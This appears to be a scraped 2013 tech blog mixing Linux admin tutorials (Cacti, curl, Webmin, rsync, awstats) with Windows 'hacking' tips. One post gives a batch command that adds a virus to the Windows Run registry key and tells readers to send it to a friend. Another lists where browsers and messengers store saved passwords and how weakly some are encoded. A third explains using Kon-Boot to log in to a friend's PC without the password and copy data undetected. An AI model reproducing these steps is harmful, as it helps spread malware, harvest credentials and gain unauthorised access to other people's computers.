Monday, April 29, 2013

How to Install Cacti on Linux


Install Cacti along with its dependencies. httpd, PHP, and MySQL are also required.
[root@www ~]# yum --enablerepo=dag -y install cacti* net-snmp* rrdtool

[root@www ~]# vi /etc/snmp/snmpd.conf

com2sec notConfigUser default public
com2sec local localhost private
com2sec mynetwork 192.168.0.0/24 public

group notConfigGroup v1 notConfigUser
group notConfigGroup v2c notConfigUser
group MyROGroup v1 mynetwork
group MyROGroup v2c mynetwork
group MyRWGroup v1 local
group MyRWGroup v2c local

view systemview included .1.3.6.1.2.1.1
view systemview included .1.3.6.1.2.1.25.1.1
view all included .1 80

# line 66: comment out the default access line and add the two lines below it
#access notConfigGroup "" any noauth exact systemview none none
access MyROGroup "" any noauth exact all none none
access MyRWGroup "" any noauth exact all all none


[root@www ~]# /etc/rc.d/init.d/snmpd start

Starting snmpd:                [  OK  ]

[root@www ~]# chkconfig snmpd on

[root@www ~]# mysqladmin -u root -p create cacti                  # create DB
Enter password:

[root@www ~]# mysql -p cacti < /var/www/cacti/cacti.sql   # import DB
Enter password:
[root@www ~]# mysql -u root -p      # log in to MySQL

Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4 to server version: 5.0.22

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
# set password for cactiuser

mysql> grant all on cacti.* to cactiuser@localhost identified by 'password';
Query OK, 0 rows affected (0.00 sec)

mysql> exit
Bye

[root@www ~]# vi /var/www/cacti/include/config.php   # change cactiuser's password

$database_password = "password";

[root@www ~]# chown -R apache. /var/www/cacti

[root@www ~]# vi /etc/httpd/conf.d/cacti.conf

allow from 127.0.0.1 192.168.0.0/24


[root@www ~]# /etc/rc.d/init.d/httpd reload

Reloading httpd:     [  OK  ]

Initial settings for Cacti

Access 'http://(your hostname or IP address)/cacti/' with a web browser. The following screen is shown; click 'Next'.

Wednesday, April 3, 2013

curl: If-Modified-Since Command Linux / Unix Example



The HTTP protocol allows a client to specify a time condition for the document it requests, using If-Modified-Since or If-Unmodified-Since. How do I use the curl Unix/Linux command line to test a server with an If-Modified-Since condition and validate Last-Modified settings?

You can use the curl command to see whether a copy of an HTTP resource (such as text/html or image/png) that you hold is still valid. However, this only works if the response has a Last-Modified header. You can send a Last-Modified header from your web server or your web application.

Step #1: Find out if response has a Last-Modified header

Type the following curl command:

curl --silent --head http://imagia.in/foo/bar/image.png
curl --silent --head http://imagia.in/foo/help.html

OR

curl -I http://imagia.in/foo/bar/image.png
curl -I http://imagia.in/foo/help.html


In this example, note down the Last-Modified header in the response to this HEAD request:
$ curl -I http://www.imagia.in/faq/
Sample outputs:

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 11 Dec 2012 10:10:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Whom: l2-com-cyber
Last-Modified: Tue, 11 Dec 2012 10:10:23 GMT
Cache-Control: max-age=299, must-revalidate
Vary: Cookie
X-Pingback: http://www.imagia.in/faq/xmlrpc.php
X-Galaxy: Andromeda-1
Vary: Accept-Encoding

The syntax is as follows to send If-Modified-Since header using the curl command line:
$ curl -I --header 'If-Modified-Since: DATE-FORMAT-HERE' http://imagia.in/foo/bar/image.png
$ curl -I --header 'If-Modified-Since: Tue, 11 Dec 2012 10:10:24 GMT' http://www.imagia.in/faq/

Sample outputs:
HTTP/1.1 304 Not Modified
Server: nginx
Date: Tue, 11 Dec 2012 10:12:11 GMT
Connection: keep-alive
X-Whom: l2-com-cyber
Vary: Cookie
Last-Modified: Tue, 11 Dec 2012 10:10:23 GMT
X-Galaxy: Andromeda-1
Vary: Accept-Encoding

The server sends a 304 Not Modified response, indicating that the resource supports Last-Modified validation.
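The two steps above can be scripted. A minimal sketch (the extraction function and variable names are my own; the sample headers are the ones shown above):

```shell
# Pull the Last-Modified value out of raw response headers.
extract_last_modified() {
  tr -d '\r' | awk -F': ' 'tolower($1) == "last-modified" { print $2 }'
}

# Sample headers (trimmed from the HEAD response above).
headers='HTTP/1.1 200 OK
Server: nginx
Last-Modified: Tue, 11 Dec 2012 10:10:23 GMT
Vary: Cookie'

lm=$(printf '%s\n' "$headers" | extract_last_modified)
echo "$lm"    # prints: Tue, 11 Dec 2012 10:10:23 GMT

# With the value in hand, the conditional request is simply:
# curl -I --header "If-Modified-Since: $lm" http://www.imagia.in/faq/
```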

Tuesday, April 2, 2013

Red Hat Enterprise Linux 5 administration ebooks download


Here we go

Download Link  

RedHat Enterprise Linux 5 Administration

Lock/Unlock Computer With Pendrive


SYSKEY is a utility that encrypts the hashed password information in a SAM database in a Windows system using a 128-bit encryption key.

SYSKEY was an optional feature added in Windows NT 4.0 SP3. It was meant to protect against offline password cracking attacks, so that the SAM database would still be secure even if someone had a copy of it. However, in December 1999, a security team from BindView found a security hole in SYSKEY indicating that a certain form of offline cryptanalytic attack is possible. A brute force attack then appeared to be feasible.

Microsoft later collaborated with BindView to issue a fix for the problem (dubbed the 'Syskey Bug'), which appears to have been settled, and SYSKEY has been pronounced secure enough to resist brute force attack.

According to Todd Sabin of the BindView RAZOR team, the pre-RC3 versions of Windows 2000 were also affected.

So this is pretty cool, right?  Well, I really like the idea of keeping this on Floppy so that it requires a floppy disk (a sort of 2 factor (hardware/software) authentication?).

Naturally I wanted to go a bit further and use this on a USB drive instead of storing to a Floppy.  I can’t see myself carrying a floppy and a USB floppy drive around with me.  After all, this provides another layer of security.

NOTE: I haven't tested copying data from one USB drive to another to see if it works as a backup. If it does, you could lock away a spare USB drive in case the first is lost.

Here’s how to get this to work using a USB drive.

1.  Insert your USB drive into your system and wait for it to be recognized and install any necessary drivers.

2.  Fire up disk management and re-assign the drive letter it was given to “A”.


Start up disk management by clicking Start and typing diskmgmt.msc

 


Right-click the USB drive and choose to assign a drive letter or path.


Assign it to letter “A”


Accept the warning message


Now your USB drive is “A”

3.  Run Syskey and save encryption to USB Drive “A”


Click Start and type syskey followed by hitting Enter


Syskey launched; click "Update".

Choose “Store Startup key on floppy disk” and click “OK”


You'll be prompted to insert your diskette. Make sure your USB drive is inserted and writable.

4.  Reboot and have fun.  Don't lose your USB disk!  To revert this, run syskey again and choose to store the key locally instead of "on a floppy disk".

Convert Text Message to Voice Message without using any Tool


Hello Guys,

Today I have something good for you: how to convert a text message to a voice message. By following these steps you can convert any text message to speech.

Step 1: Open Notepad from Start > All Programs > Accessories.

Step 2: Copy-paste the following code into the text area.

Dim msg, sapi
msg=InputBox("Enter your text for conversion: For Ex. Kyrion.","Kyrion.in: Text2Speech Converter")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg

Step 3: Open File > Save As.

Step 4: In the Save As dialog box, enter any name for the file with the extension .vbs and click Save.


Step 5: Open the file that you saved.

Step 6: Enter the text which you want to convert to speech.

Step 7: Click the OK button.

Now you will see the pure magic of Windows. After the dialog box closes, you will hear what you typed in the dialog box: text converted into speech in Windows using nothing but Notepad. You will be thrilled to know that your text has been converted into speech.

Change View Mode of Magnifier in Windows 7


Hey Guys,
Windows 7/Vista has a very nice feature called Magnifier (to use it, press 'WinKey' and '+'). Sometimes when we change the view mode to Docked, the other view modes get disabled; in this tut I am going to show you how to enable those options.

1) Go into the Registry (Start -> Run -> type in Regedit and then click OK).

2) Navigate to the following key: HKEY_CURRENT_USER\Software\Microsoft\ScreenMagnifier

3) Change the MagnificationMode DWORD value to either 2 or 3.

4) Close Registry Editor

5) Restart the Computer

How to Execute virus on Start up


Hello guys,

You must be familiar with viruses, and you probably know how to create them. Once a virus is executed it shows its impact, but only while the system is on; if you turn the system off, all of the virus's processes are killed too.

So our requirement is to run the virus again even after the system is rebooted. For that we have to place the virus in startup. We don't want to do it manually; instead, we'll do it with the help of a batch file.

So let us assume we have a virus, demo.exe.

Follow these steps to send it to startup.

1. Open a Notepad file

2. Write down the following command

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v demo /t REG_SZ /d demo.exe

3. Now save the Notepad file with any name, say kyrion, but the extension should be .bat; that is, create a batch file, e.g. kyrion.bat.

4. Now send kyrion.bat along with the demo.exe virus to your friend. Whenever he clicks the kyrion.bat file, demo.exe will automatically be added to startup.

5. The impact of the virus will then also be visible after the system restarts.

All Saved Password Location


Google Chrome:

Chrome passwords are stored in a SQLite file; the site name and site username are in clear text, but the password is protected with the Triple DES algorithm. The file is called Web Data and is stored in the following location:

XP – C:\Documents and Settings\Username\Local Settings\Application Data\Google\Chrome\User Data\Default

Vista – C:\Users\Username\Appdata\Local\Google\Chrome\User Data\Default

Trillian:

Note: I have just realised that in the new version of Trillian the passwords may be stored/encrypted differently.

Trillian passwords are stored in .ini files. The first character of the password is XOR-encrypted with the key 243, then the password is converted into hex. The file is named after what the password is for, so for ICQ it would be icq.ini. (In new versions I think they are all stored in a file called accounts.ini or something similar; if you open it with Notepad you will see all the data plus the encrypted password.) The files are stored in the following locations:

XP (old version) – C:\Program Files\Trillian\users\

XP (new version) – C:\Documents and Settings\Username\Local Settings\Application Data\Trillian\user\global (I am not sure of the exact path, but it is somewhere there)

Vista (old version)- C:\Program Files\Trillian\users\

Vista (new version)- C:\Users\Username\Appdata\Roaming\Trillian\user\global

MSN /Windows Live Messenger:

MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Creds\[Account Name]

Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry names beginning with "WindowsLive:name=". It uses a set of Win API functions (the Credential APIs) to store its security data (credentials). These functions store user information, such as names and passwords for the accounts (Windows Live ID credentials). Windows Live ID credential records are controlled by the operating system for each user and for each session. They are keyed by "target name" and "type"; if you are familiar with SQL, you can think of target name and type as the primary key.

Paltalk:

Paltalk passwords all use the same encryption algorithm and are stored in the registry. To encrypt a new password, Paltalk looks at the serial number of disk C:\ and mixes it with the nickname. The resulting string is then mixed again with the password and some other constants. The final string is then encoded and written to the registry.

AIM, ICQ and Yahoo Messenger passwords that are stored by Paltalk are encoded with the Base64 algorithm.

The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name]
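Since those stored AIM/ICQ/Yahoo values are plain Base64, decoding takes a single command. A sketch with a made-up value (not real registry data):

```shell
# Decode a Base64-encoded value of the kind Paltalk stores for AIM/ICQ/Yahoo.
# 'c2VjcmV0' is an invented example string, not a real stored password.
printf 'c2VjcmV0' | base64 -d    # prints: secret
```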

Google Talk:

Google Talk passwords are encoded/decoded using the Crypto API. Encrypted Gmail passwords are stored by Google Talk in the registry under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[Account Name]

Firefox:

The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)

These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]

Also, key3.db, located in the same folder, is used for encryption/decryption of the passwords.

Yahoo Messenger 6.x:

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager ("EOptions string" value)

Yahoo Messenger 7.5 or later:

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager, in the "ETS" value.

The value stored in "ETS" cannot be recovered back to the original password.

AIM:

AIM uses Blowfish and base64 algorithms to encrypt the AIM passwords.

A 448-bit key is used to encrypt the password with Blowfish. The encrypted string is then encoded using Base64. The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords

Filezilla:

Passwords are stored in an .xml file in the FileZilla folder under AppData.

Internet Explorer 4.00 – 6.00:

The passwords are stored in a secret location in the Registry known as the “Protected Storage”.

The base key of the Protected Storage is located under the following key:

“HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”.

You can browse the above key in the Registry Editor (RegEdit), but you won't be able to view the passwords, because they are encrypted.

Also, this key cannot easily be moved from one computer to another, like you can with regular Registry keys.

Internet Explorer 7.00 – 8.00:

The newer versions of Internet Explorer store the passwords in two different locations.

AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.

HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.

Opera:

The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile

Outlook Express (All Versions):

The POP3/SMTP/IMAP passwords of Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.

Outlook 98/2000:

Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.

Outlook 2002-2008:

All new versions of Outlook store the passwords in the same Registry key of the account settings.

The accounts are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[Profile Name]\9375CFF0413111d3B88A00104B2A6676\[Account Index]

If you use Outlook to connect to an account on an Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.

ThunderBird:

The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]

You should look for a filename with a .s extension.

Digsby:

The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat

All other passwords are stored in Digsby servers.

Facebook Tips & Tricks


Hello Guys,

This post is just to make handling your social life easier. Here I will show you various shortcuts for Facebook in the Google Chrome and Mozilla Firefox browsers.

Chrome        Firefox                  Facebook
Alt+m           Shift+Alt+m           New Message
Alt+0            Shift+Alt+0            Help Center
Alt+1            Shift+Alt+1            Home Page
Alt+2            Shift+Alt+2            Profile Page
Alt+3            Shift+Alt+3            Manage Friend List
Alt+4            Shift+Alt+4            Message List
Alt+5            Shift+Alt+5            Notification Page
Alt+6            Shift+Alt+6            Account Settings
Alt+7            Shift+Alt+7            Privacy Settings
Alt+8            Shift+Alt+8            Facebook Fan Page
Alt+9            Shift+Alt+9            Facebook Terms
Alt+?            Shift+Alt+?              Search Box

 

Enjoy and Have Fun!!!

Cool Keyboard Tricks in Windows 7


Hello Guys,

In this tutorial I am going to show you some cool keyboard tricks which will help you work more efficiently and faster. You can even impress your friends or colleagues by using these shortcuts.

[Windows] + [D]: Show or hide the desktop.
[Windows] + [Home]: Minimize all but the selected window. Reverse by pressing the key combination again.
[Windows] + [Spacebar]: Make all open windows transparent to view gadgets and icons on the desktop.
[Windows] + left arrow OR [Windows] + right arrow: Dock the selected window to the left or right half of your screen.
[Windows] + up arrow OR [Windows] + down arrow: Maximize or restore the selected window.
[Windows] + [Tab]: Launch a 3D representation of open windows; press [Tab] again to flip through them.
[Windows] + [B]: Put focus on the 'show hidden icons' button on the system tray.
[Windows] + [1] to [Windows] + [9]: Launch the first through ninth icon on the taskbar, including items pinned to the taskbar.
[Windows] + [Shift] + [1] to [Windows] + [Shift] + [9]: Start a new instance of the respective taskbar icon.
[Windows] + [Alt] + [1] to [Windows] + [Alt] + [9]: Open the jump list for the respective icon.
[Windows] + [T] OR [Windows] + [Shift] + [T]: Move focus to the front or back of the taskbar.
[Alt] + [Ctrl] + [Tab] + left/right/up/down arrow: Flip window.
[Alt] + [Tab]: Cycle through open windows.
[Windows] + [P]: Select the projector mode.
[Windows] + [+] OR [Windows] + [-]: Activate the Windows Magnifier to zoom in or out of the screen.
[Ctrl] + [Alt] + [D]: Switch Magnifier to docked mode.
[Ctrl] + [Alt] + [L]: Switch to lens mode.
[Ctrl] + [Alt] + [F]: Switch from docked or lens mode back to full-screen mode.
[Ctrl] + [Alt] + [I]: Invert colors.
[Windows] + [Esc]: Exit Magnifier views.
[Windows] + [G]: Cycle through desktop gadgets.
[Windows] + [X]: Launch Windows Mobility Center. Especially useful if you're working on a laptop.

Chakravyuh Online Event Schedule



Dear Warrior,

We express our heartiest gratitude to you for becoming a part of Chakravyuh!

Hereby in this email, we would like to update you about the schedule of Chakravyuh.

30th March 2012 1700 Hrs:   Registration Closes

31st March 2012 1900 Hrs:   Chakravyuh Online Event Starts for 60 minutes

31st March 2012 2000 Hrs:   Chakravyuh Online Event Closes

1st April 2012 1800 Hrs:       Online Event Result Declaration


Stay tuned on www.chakravyuh.org


Special Instructions

·         Prepare the following topics for the Online Event

o   Web Hacking

o   System Hacking

o   Network Hacking

o   Reverse Engineering

o   Digital Forensics

·         Keep your Chakravyuh Login Password with you all the time

·         Forgot Password functionality will not be available during the Online Event

·         Be prepared with a High Speed Internet Connection for Online Event


 All the best!!!

How to Search Quickly into your System


On our computers it takes a lot of time to search for a file or folder, and we have to dig through many folders to find it. So in this tutorial I am posting a trick which saves time while searching for a particular file or folder. This trick saves all the subdirectory and file names into a text file without browsing the drive or folder.

First open the Command Prompt, then browse to the folder whose subdirectories and files you want to analyze, using cd commands.

For example, to navigate to E:\hack,

in the Command Prompt type e: and then cd hack

1. Now, if you want to list all the subdirectories and the files present inside them, type the following command

dir *.* /s /b > list.txt

2. If you want to see only PDF files, use this command

dir *.pdf /s /b > list.txt

3. Similarly, if you want to search only Microsoft Word files, use this command

dir *.doc /s /b > list.txt

4. Likewise, if you want to search for a file with a particular name, say address.doc

dir address.* /s /b > list.txt

or

dir address.doc /s /b > list.txt
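For reference, the Unix/Linux equivalents of the dir commands above use find (the directory and file names here are illustrative, standing in for E:\hack):

```shell
# Build a small demo tree (stand-in for E:\hack).
mkdir -p demo/sub
touch demo/a.pdf demo/sub/b.pdf demo/notes.txt

# Everything, recursively, bare full paths (like: dir *.* /s /b > list.txt)
find demo -type f > list.txt

# Only PDF files (like: dir *.pdf /s /b > list.txt)
find demo -type f -name '*.pdf' > pdf-list.txt

# Only a particular name (like: dir address.doc /s /b > list.txt)
find demo -type f -name 'address.doc' > name-list.txt

grep -c '\.pdf$' pdf-list.txt    # prints: 2
```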

How to Lock Desktop Icons


In this tutorial we'll see how we can lock our desktop icons so that no one can change the arrangement of the icons on the desktop. It generally happens that someone comes to our system and messes up the arrangement.

So for that, open the Registry and go to the following path:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Right-click in the right pane, select New > DWORD Value, name it NoSaveSettings, and press Enter. Right-click the new NoSaveSettings item and select Modify. Enter 1 in the Value data box. After this, whenever you restart Windows, your settings will return to their current state.
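The same change can be captured in a .reg file and imported by double-clicking it (a sketch; back up the key before importing):

```
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSaveSettings"=dword:00000001
```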

 

How to Hide a folder without any third party Software


Step 1 : Rename any folder with the extension {645FF040-5081-101B-9F08-00AA002F954E}

For example,
if you have a folder named "Anything",
press F2,
then type "Anything.{645FF040-5081-101B-9F08-00AA002F954E}"
and press Enter.

Step 2 : To get it back to its original form,
make a new batch file with any name and type
ren Anything.{645FF040-5081-101B-9F08-00AA002F954E} Anything

How to Bypass Windows Authentication



Guys, you probably know how to break a Windows password using a live OS. But using a live OS is a bit complicated, and sometimes it takes a lot of time to crack a password. So in this tutorial you will see how to bypass Windows authentication, avoiding that complicated situation and saving your time.

First we need a piece of software called Kon-Boot, and we have to make either a CD or a pendrive bootable with it. Kon-Boot comes in many versions, but I am using Kon-Boot v1.1; below are the steps for making the CD or pendrive bootable.

1. Insert your CD into your CD-ROM drive, or plug your pendrive into your system.

2. Open Kon-Boot v1.1 folder.



3. For making Bootable CD go to KONCD and burn the image file.

4. For creating a bootable pendrive, go to KONUSB and double-click Konbootintall.exe; you will get a command prompt. Type your pendrive's drive letter (i.e. g: or h:).


That's all you have to do. Now your CD or pendrive is bootable.

Restart the system you want to bypass and insert the bootable Kon-Boot CD or plug in your pendrive. Make sure CD or USB is first in the boot priority; if it is not, hit F12 at the BIOS screen and choose CD or USB as the first option. Now the system will start with the help of Kon-Boot and you will get this screen.

Now choose the Kon-Boot v1.1 option.


Press Enter when you get the following screen.

 

Kon-Boot will modify memory to let you log in to Windows without knowing a password.


In Windows XP it will go straight to the desktop without showing any login screen. Windows 7 will show the login screen, but that doesn't mean you need the actual password: just type any random password, or simply hit Enter without giving any password, and you will get the desktop. Now you can take control of the whole system; you can modify anything, copy data onto your pendrive, and so on. The next time your friend logs in, he/she will get the same login screen with the same password, which means your friend will not get any notification that the system has been accessed.

Kon-Boot can also bypass the authentication process of Linux (though not all distros) and Mac OS.

Access Banned Torrent and Video Sites in India


Some of the ISPs in India have already started blocking torrent websites (The PirateBay, Torrentz, etc.) as well as some legal video sharing websites (like Vimeo, DailyMotion). Nowadays, when someone tries to access these websites, he/she may receive a rather annoying message:

Currently, two Indian ISPs, namely Reliance and Airtel, have blocked specific websites. The reason for the blocking is as yet unclear, but the citing of a court order in the displayed message gives us a clue. The US Government has already blocked websites in the past on grounds of copyright infringement, and it is certain that other countries have started to follow suit. Torrents have regularly provided users access to copyrighted content worldwide, particularly new movie releases, which could be downloaded through torrents.

However, websites like Vimeo and DailyMotion are legal video sharing websites like YouTube, and the reason is still unclear as to why these websites have been blocked as per "Court Orders". In the coming days, we might also start seeing other service providers blocking a number of websites on government orders.

There is, however, a way users can still access these blocked websites legally without using a proxy. The trick lies in the protocol used for accessing the website. The sites being blocked in India are generally blocked using filters in the network that prevent the sites from opening. More often than not, these filters work on normal channels and don't block secured websites.

You can access the Secured Version of the blocked websites using “https” instead of “http” in the address bar. When you open the blocked site with “https”, the website opens without any errors and you get a fully functional website.


Most people try to access these websites via a proxy, but using a proxy has its own disadvantages. The proxy network a person is using may be insecure. Moreover, proxies slow down network access considerably, because all requests are channeled through the proxy server, which handles a large number of clients and therefore responds slowly.

Using https does not need a proxy; sites can be opened directly, and response times are quick because traffic is not channeled through any public server.

Disclaimer:  We DO NOT endorse any kind of piracy or copyrighted material. This article is strictly for educational and informational purposes only.

Working Of Zenmap ( Network Scanning Tool )

Zenmap is the official graphical user interface (GUI) for the Nmap Security Scanner. It is a multi-platform, free and open-source application designed to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scans can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.

CHOSEN SETUP

As Zenmap runs on Windows/Linux, I chose the following setup:

Windows  OS – Windows 7 installed on a system

Version- Zenmap 6 (http://nmap.org/dist/nmap-6.00-setup.exe)

 Scanning

Start Zenmap by typing zenmap in a terminal or by clicking the Zenmap icon in your desktop environment.

First, select the target. The target can be any domain name or IP address; right now my target is 10.0.0.2.


Profile

The Profile combo box holds profiles for several common scans. After selecting a profile, the Nmap command line associated with it is displayed on the screen. Of course, it is possible to edit these profiles or create new ones.

It is also possible to type in an Nmap command and have it executed without using a profile. Just type in the command and press return or click “Scan”.

In Zenmap there are 10 types of profiles:

a.  INTENSE SCAN

Command = nmap -T4 -A 10.0.0.2

Description  = An intense, comprehensive scan. The -A option enables OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute). Without root privileges only version detection and script scanning are run. This is considered an intrusive scan.


SCAN RESULT TABS

Each scan window contains four tabs, each displaying a different aspect of the scan results. They are:

a) Nmap Output

b) Ports / Hosts

c) Topology

d) Host Details

Each of these is discussed in this section:

NMAP OUTPUT

The “Nmap Output” tab is displayed by default when a scan is run. It shows the familiar Nmap terminal output.

PORTS / HOSTS

When a service is selected, the “Ports / Hosts” tab shows all the hosts which have that port open or filtered. This is a good way to quickly answer the question “What computers are running HTTP?”


TOPOLOGY


The “Topology” tab is an interactive view of the connections between hosts in a network.

 


HOST DETAILS

The "Host Details" tab breaks all the information about a single host into a hierarchical display. Shown are the host's names and addresses, its state (up or down), the number and status of scanned ports, and the host's uptime, operating system, and OS icon. When no exact OS match is found, the closest matches are displayed.

Transfer Files From One UNIX Server To Another Server Using Windows / Linux Desktop


Linux SCP Command explained

How do I securely transfer files from one UNIX / Linux server to another UNIX server using Windows or Linux desktop clients without using ftp client?

You need to use a secure sftp or scp client for Windows XP / Vista / 7. Under a Linux or Apple Mac OS X desktop you can use the regular OpenSSH scp / sftp client to transfer files.

Windows SSH Client


You can use the free SFTP, FTP and SCP clients for Windows called PuTTY and WinSCP.

Linux / UNIX / OS X SSH scp Client Examples


Use the following command from the server to which you want the files to go. In this example, transfer all files (/var/www/html) from remote server called server1 to local directory called /backup:
scp -r user@server1:/var/www/html/ /backup
In the following example, transfer all files (/var/www/html) from remote server called server1 to another server called server2:
scp -r user@server1:/var/www/html/ user@server2:/var/www/html/

Say hello to rsync


I recommend using the rsync command, which will only push or download updated files. It can copy locally, to/from another host over any remote shell, or to/from a remote rsync daemon. In this example, copy files from the remote server called server1 into the /backup directory:
rsync -avz -e ssh user@server1:/var/www/html /backup

How to Install and configure webmin on Linux


Install Webmin, a web-based system configuration tool for administrators.

Install required Perl module first.

[root@dlp ~]# yum -y install perl-Net-SSLeay

Download the latest version of Webmin and install it.

[root@dlp ~]# wget http://download.webmin.com/download/yum/webmin-1.550-1.noarch.rpm

[root@dlp ~]# rpm -Uvh webmin-1.550-1.noarch.rpm 
warning: webmin-1.550-1.noarch.rpm: Header V3 DSA/SHA1 Signature, key ID 11f63c51: NOKEY
Preparing... ########################################### [100%]
Operating system is Generic Linux
1:webmin ########################################### [100%]
ip_tables: (C) 2000-2006 Netfilter Core Team
Webmin install complete. You can now login to https://www.server.world:10000/
as root with your root password.

[root@dlp ~]# vi /etc/webmin/miniserv.conf

# add at the last line: IP addresses you allow to access

allow=127.0.0.1 10.0.0.0/24


[root@dlp ~]# /etc/rc.d/init.d/webmin restart 

Stopping Webmin server in /usr/libexec/webmin
Starting Webmin server in /usr/libexec/webmin
Pre-loaded WebminCore

Access "https://(hostname or IP address):10000/" with a web browser, then log in as the root user.

 

 


 

After logging in, you can configure the system from here without using any commands.


 

Wednesday, March 27, 2013

Scheduling awstats report generation



We've looked at running awstats reports, but only manually. Let's automate report generation so all you need to worry about is looking at those sweet, sweet numbers.




Automating awstats


In the previous article in this series we set up awstats for your site and ran an update of the reports manually. That's all well and good, but the command to update is big and ugly, and it would be kind of a pain to have to run it every time you want to view updated stats.

Fortunately Linux is chock full of ways to automate stuff. One way is to create a cron script to do all the updating, but since we're shooting for simple we should use a tool that's already processing your web logs on a regular basis. We can piggyback our updates onto logrotate's regular rotation tasks.

Scheduling reports with logrotate


With this approach we'll take advantage of the fact that logrotate is already performing regular log rotation for your domain. I mean, you do have your logs rotating automatically, right?

If not, visit this article series on logrotate and follow the directions there to set up log rotation for your virtual host. Log rotation keeps those logs from becoming giant disk-space-eating behemoths, so it's a very good idea. Really, do it now. I'll wait.

Now that we're certain you have logrotate managing your web logs, let's add a step to what logrotate does when it performs the rotation.

Editing the logrotate entry


Let's look at the logrotate.d file for a virtual host that's just a modification of the default entry for apache on Ubuntu:
/home/demo/public_html/example.com/logs/*.log {
    weekly
    missingok
    rotate 52
    compress
    delaycompress
    notifempty
    create 640 root adm
    sharedscripts
    postrotate
        if [ -f "`. /etc/apache2/envvars ; echo ${APACHE_PID_FILE:-/var/run/apache2.pid}`" ]; then
            /etc/init.d/apache2 reload > /dev/null
        fi
    endscript
}

Don't worry too much about most of those entries if you haven't seen them before. There are only a couple important bits to note here.

First, take a look at the "weekly" directive in that logrotate file. That's okay for simple log rotation, but you probably want your web traffic stats updating daily. In that case you'd want to change that to "daily" so the rotate script runs more frequently, and possibly modify the "rotate 52" entry to keep more archived log files.

Next we look at what we want to add to the logrotate process. See that "postrotate" block up there? Don't worry about what's inside, just note that it's there. What that does is run some stuff after the log rotation is done (in this case, tell apache to reload if it's running). The reason we're looking at it is because there's also a "prerotate" directive that we can use to have awstats run through a log file before it's rotated.

The "prerotate" directive should run the stats update and generate the reports. And it should run just like the command we ran to get our reports. We would create a prerotate block like:
prerotate
    /usr/local/awstats/tools/awstats_buildstaticpages.pl -update -config=www.example.com -dir=/home/demo/public_html/example.com/public/webstats -awstatsprog=/usr/local/awstats/wwwroot/cgi-bin/awstats.pl > /dev/null
endscript

The "> /dev/null" bit redirects the normal output of the command so it doesn't get sent to the console or emailed to root.

Inserted into the existing logrotate file for our virtual host, the whole thing would look like:
/home/demo/public_html/example.com/logs/*.log {
    daily
    missingok
    rotate 52
    compress
    delaycompress
    notifempty
    create 640 root adm
    sharedscripts
    prerotate
        /usr/local/awstats/tools/awstats_buildstaticpages.pl -update -config=www.example.com -dir=/home/demo/public_html/example.com/public/webstats -awstatsprog=/usr/local/awstats/wwwroot/cgi-bin/awstats.pl > /dev/null
    endscript
    postrotate
        if [ -f "`. /etc/apache2/envvars ; echo ${APACHE_PID_FILE:-/var/run/apache2.pid}`" ]; then
            /etc/init.d/apache2 reload > /dev/null
        fi
    endscript
}

And with that, every time the logs get rotated, the web stats get updated too.

Why use logrotate?


Instead of using logrotate to run the web stats update we could just schedule the stats to update through cron. So why insert the commands into logrotate?

The main reason is accuracy. By sticking a web stats update into the log rotation process we make sure that awstats is looking at log entries up until the last possible moment, when the log is rotated. If you have the web server reloading instead of restarting there might be a couple log entries missed (since the old log file would still be used as the old connections finish). The information lost in that case is negligible and not worth the downtime required to fully restart the web server.

If you want the web traffic reports to update more often than the web logs are rotated, you can use cron to run the update and report-building scripts on a more frequent schedule (like hourly). Awstats will recognize log entries that have already been processed and skip them when analyzing the data.
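As a sketch, such an hourly update could be dropped into /etc/cron.hourly. The file name and all the paths below follow the earlier examples and are assumptions about your layout; awstats itself must already be installed for this to do anything:

```shell
#!/bin/sh
# /etc/cron.hourly/awstats.www.example.com (hypothetical name and paths)
# Re-run the stats update and rebuild the static report pages.
/usr/local/awstats/tools/awstats_buildstaticpages.pl -update \
    -config=www.example.com \
    -dir=/home/demo/public_html/example.com/public/webstats \
    -awstatsprog=/usr/local/awstats/wwwroot/cgi-bin/awstats.pl > /dev/null
```

Remember to make the file executable (chmod a+x) so cron will actually run it.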

Monthly reports


